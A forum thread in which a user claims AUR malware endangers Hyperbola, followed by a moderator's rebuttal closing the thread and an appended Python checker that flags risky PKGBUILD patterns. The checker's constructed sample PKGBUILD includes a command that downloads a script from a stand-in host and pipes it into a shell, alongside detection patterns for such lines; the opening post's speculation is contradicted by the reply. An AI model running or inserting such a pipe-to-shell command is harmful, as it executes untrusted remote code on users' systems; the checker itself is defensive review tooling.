1 (edited by Ribby 2025-08-03 06:23:48)

Topic: Arch Linux's "AUR" OS repository has malware

According to the Linux news, the Arch Linux OS repository has recent user-defined uploads that are malware. Sources state that Arch doesn't vet the uploads, so its OS repository relies on community activity. Some say that more malware was uploaded after the first malware batch was cleared.

For Arch users, I assume that a degree of diligence is required when it comes to installing programs. I assume that the practice is verification before compiling the source code. A straight software installation from the OS repository is a blind check. The server has some questionable protocols that might as well jeopardize Arch into Windows or the iPod Apple store.

I know that Hyperbola GNU/Linux-libre is regarded as a different OS from Arch Linux, but I can't shake the feeling that it uses some of its design. Can anyone ensure that a vetting process is in effect for any file uploads/edits in the Hyperbola OS repository? Furthermore, if Hyperbola does derive from Arch, does that mean there is a risk of unknowingly extracting malware as a base for software on other Arch-like OSes? If Hyperbola does indeed find itself at risk from derivation, it is an understandable move to develop HyperbolaBSD. And what about the Arch users, where should they go? I hope that they look forward to Hyperbola (while I can't vouch for encryption options, I can attest that Windows XP on a 32-bit machine would be on a similar encryption level), but I suppose Parabola would suffice for their taste.
As they say, it is nigh time to abandon ship, the Arch ship, that is.

Cited references:
https://www.bleepingcomputer.com/news/s … t-malware/


Re: Arch Linux's "AUR" OS repository has malware

I am closing this thread now, as you have created a presumed connection that is totally wrong: first and foremost, Hyperbola does not include any kind of malware taken from the AUR. You have also demonstrated now that you have not completely read about the current problem and issue: anyone can create their own packaging scripts. This is true for every system distribution, be it Ubuntu with its PPA repositories driven by users (and also involved in possible malware in the past, with included warnings), Debian with DEB packages created elsewhere and ready for download, Fedora with user-driven repositories outside, Slackware, Gentoo and therefore also Arch GNU/Linux.

You are now creating a misleading and clearly wrong connection: HyperbolaBSD was not created out of a possible derivation. Hyperbola is developed completely independently, only using pacman. We have no connection to the AUR, and we advise every user / developer to look at the packaging script. If they do not want to do this, we cannot help out, and we are surely also not willing to do so.

Next time, please read the source you are using. To quote:

We strongly encourage users that may have installed one of these packages to remove them from their system and to take the necessary measures in order to ensure they were not compromised

This is written directly within that article as a quote from the AUR administration. And we are talking here foremost about so-called binary packages, created from upstream-distributed binary data and tarballs. Have you even had a look at how packages are created here? That users are making their own packages, while Hyperbola also does it directly and differently? We do not share any connection with the AUR, and our infrastructure is also built completely differently. Creating a thread based on an impression and a feeling is the wrong way, and you have been told several times in debates not to act on such a basis. Ask before acting on assumptions: we are not Arch-based. Besides that, your current statements towards Arch GNU/Linux are also wrong.

Thread closed!

Human being in favor of clear principles, and so also of freedom in soft- and hardware!

Certainly anyone who has the power to make you believe absurdities has the power to make you commit injustices: for a life of every being full of peace and kindness, including diversity and freedom. Capitalism is destroying our minds, the planet itself and the universe in the end!
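The reply's advice is to read the packaging script before building anything from a user-submitted repository. As an added example (not from this thread, and not Hyperbola's or Arch's own tooling), the Python checker below flags the indicators a reviewer looks for in a PKGBUILD: skipped checksums, sources fetched over plain http, `-bin` packages that merely repackage an upstream binary, and remote downloads piped straight into a shell. The PKGBUILD text is constructed for the demonstration and does not describe any real package.

```python
import re

# Constructed sample PKGBUILD (not a real AUR package); it contains each of
# the indicators the checker below reports.
SAMPLE_PKGBUILD = r"""
pkgname=example-bin
pkgver=1.2.3
pkgrel=1
source=("https://example.invalid/example-1.2.3.tar.gz"
        "http://example.invalid/helper.sh")
sha256sums=('SKIP'
            'deadbeef')

package() {
    curl -s http://example.invalid/post-install.sh | sh
    install -Dm755 example "$pkgdir/usr/bin/example"
}
"""

# "curl ... | sh", "wget ... | sudo bash" and similar inside a build function.
PIPE_TO_SHELL = re.compile(r'\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba)?sh\b')

def bash_array(text, name):
    """Quoted entries of a bash array assignment `name=(...)`, or [] if absent."""
    m = re.search(rf'^{name}=\((.*?)\)', text, re.S | re.M)
    return re.findall(r'["\']([^"\']*)["\']', m.group(1)) if m else []

def review_pkgbuild(text):
    """Return (severity, message) findings a reviewer would want before makepkg."""
    findings = []
    pkgname = re.search(r'^pkgname=(\S+)', text, re.M)
    if pkgname and pkgname.group(1).endswith("-bin"):
        findings.append(("info", "-bin package: repackages an upstream binary, nothing is built from source"))
    sources = bash_array(text, "source")
    sums = []
    for algo in ("sha256sums", "sha512sums", "b2sums", "md5sums"):
        sums = bash_array(text, algo)
        if sums:
            break
    for i, src in enumerate(sources):
        url = src.split("::", 1)[-1]  # makepkg allows "filename::url"
        if url.startswith("http://"):
            findings.append(("high", f"source {i}: fetched over plain http: {url}"))
        if i >= len(sums) or sums[i] == "SKIP":
            findings.append(("high", f"source {i}: no checksum, integrity is not verified: {url}"))
    for func in ("prepare", "build", "package"):
        body = re.search(rf'^{func}\(\)\s*\{{(.*?)^\}}', text, re.S | re.M)
        if body and PIPE_TO_SHELL.search(body.group(1)):
            findings.append(("critical", f"{func}(): pipes a remote download straight into a shell"))
    return findings
```

A clean script still deserves a full read: the checker only catches the mechanical signs, not a maliciously modified upstream tarball whose checksum matches.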